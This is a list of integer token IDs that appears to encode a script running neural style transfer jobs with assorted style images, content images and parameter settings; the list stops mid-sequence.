51,
14,
22915,
14,
16,
32,
21,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
4570,
405,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
17620,
62,
1050,
46493,
13,
79,
400,
6,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
16,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
2,
30719,
532,
4019,
10744,
10,
767,
2167,
87,
22,
2167,
2939,
357,
4360,
5640,
13020,
287,
6228,
9568,
3006,
8,
198,
2,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
16,
6,
532,
7635,
62,
6551,
20007,
532,
7635,
62,
9888,
657,
13,
20,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
16,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
16,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
657,
532,
9060,
62,
7857,
767,
2167,
532,
22510,
62,
2676,
602,
838,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
35073,
62,
320,
11286,
316,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
7635,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
32,
23,
12,
37,
17961,
12,
16,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
198,
2,
45537,
2,
198,
2,
3563,
56,
2538,
362,
1303,
198,
2,
45537,
2,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
17,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
17,
13,
11134,
6,
532,
15003,
4738,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
22243,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
17,
32,
16,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
220,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
17,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
17,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
17,
32,
16,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
46720,
532,
22510,
62,
2676,
602,
10053,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
48466,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
17,
32,
17,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
17,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
17,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
17,
32,
17,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
28119,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
17,
32,
18,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
17,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
17,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
17,
32,
18,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
17,
32,
19,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
17,
6,
532,
7635,
62,
6551,
807,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
17,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
17,
32,
19,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
17,
32,
20,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
17,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
17,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
17,
32,
20,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
21431,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
17,
32,
21,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
17,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
17,
13,
11134,
6,
532,
11299,
62,
6551,
1315,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
17,
32,
21,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
4570,
405,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
17620,
62,
1050,
46493,
13,
79,
400,
6,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
17,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
2,
30719,
532,
4019,
10744,
10,
767,
2167,
87,
22,
2167,
2939,
357,
4360,
5640,
13020,
287,
6228,
9568,
3006,
8,
198,
2,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
17,
6,
532,
7635,
62,
6551,
20007,
532,
7635,
62,
9888,
657,
13,
20,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
17,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
17,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
657,
532,
9060,
62,
7857,
767,
2167,
532,
22510,
62,
2676,
602,
838,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
35073,
62,
320,
11286,
316,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
7635,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
32,
23,
12,
37,
17961,
12,
17,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
198,
2,
45537,
2,
198,
2,
3563,
56,
2538,
513,
1303,
198,
2,
45537,
2,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
18,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
18,
13,
11134,
6,
532,
15003,
4738,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
22243,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
18,
32,
16,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
220,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
18,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
18,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
18,
32,
16,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
46720,
532,
22510,
62,
2676,
602,
10053,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
48466,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
18,
32,
17,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
18,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
18,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
18,
32,
17,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
28119,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
18,
32,
18,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
18,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
18,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
18,
32,
18,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
18,
32,
19,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
18,
6,
532,
7635,
62,
6551,
807,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
18,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
18,
32,
19,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
18,
32,
20,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
18,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
18,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
18,
32,
20,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
21431,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
18,
32,
21,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
18,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
